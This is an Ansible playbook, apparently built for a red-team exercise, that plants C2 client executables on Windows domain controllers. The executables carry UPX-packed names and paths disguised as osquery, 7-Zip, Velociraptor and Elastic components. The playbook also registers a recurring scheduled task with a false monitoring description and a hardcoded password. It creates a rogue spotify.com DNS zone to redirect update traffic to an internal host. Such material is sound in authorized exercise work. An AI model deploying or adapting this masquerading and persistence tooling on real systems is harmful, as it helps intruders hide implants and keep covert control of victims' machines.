---
- name: Copy and Install C2 Files
  hosts:
    - t1dc
    #- g1dc
    #- g2dc
    #- g3dc
    #- g4dc
    #- g5dc
  gather_facts: yes

  tasks:
    - name: Copy C2Files
      ansible.windows.win_copy:
        src: "{{ ansibleDirectory }}/redFiles/c2Clients/{{ item.name }}"
        dest: "{{ item.dest }}"
      loop:
        - { name: "osquery.exe", dest: 'c:\program files\osquery\osqueryd' }
        - { name: "configure_lang.exe", dest: 'c:\program files\7-zip\lang' }
        - { name: "toolbox.exe", dest: 'c:\program files\velociraptor\tools' }
        - { name: "iecleanup.exe", dest: 'c:\users\public' }
        - { name: "beatsfix.exe", dest: 'c:\elastic' }

# Compressed files with different compression with UPX - upx -1 -o configure_lang.exe configure.exe
#
    - name: Setup Scheduled Task for osquery.exe
      community.windows.win_scheduled_task:
        name: Local Monitor 
        username: '{{ teamName }}\monitor.service'
        logon_type: s4u
        password: "BdZvI0vVD"
        description: Core OS Query Monitoring Service that manages local user monitoring.
        enabled: yes
        actions:
          - path: 'c:\windows\system32\cmd.exe'
            arguments: '/c "c:\program files\osquery\osqueryd\osquery.exe"'
        triggers:
        - type: daily
          start_boundary: '2024-02-20T01:00:00'
          repetition:
            interval: PT15M
        state: present

    - name: Build Primary DNS Zone spotify.com
      community.windows.win_dns_zone:
        name: spotify.com
        replication: domain
        type: primary
        state: present

    - name: Create A Record for updates.spotify.com
      community.windows.win_dns_record:
        name: "updates"
        type: "A"
        value: "10.27.20.50"
        zone: "spotify.com"

    - name: Run Basic Powershell script to run scheduled task
      ansible.windows.win_powershell:
        script: |
          Start-ScheduledTask -TaskName "Local Monitor"

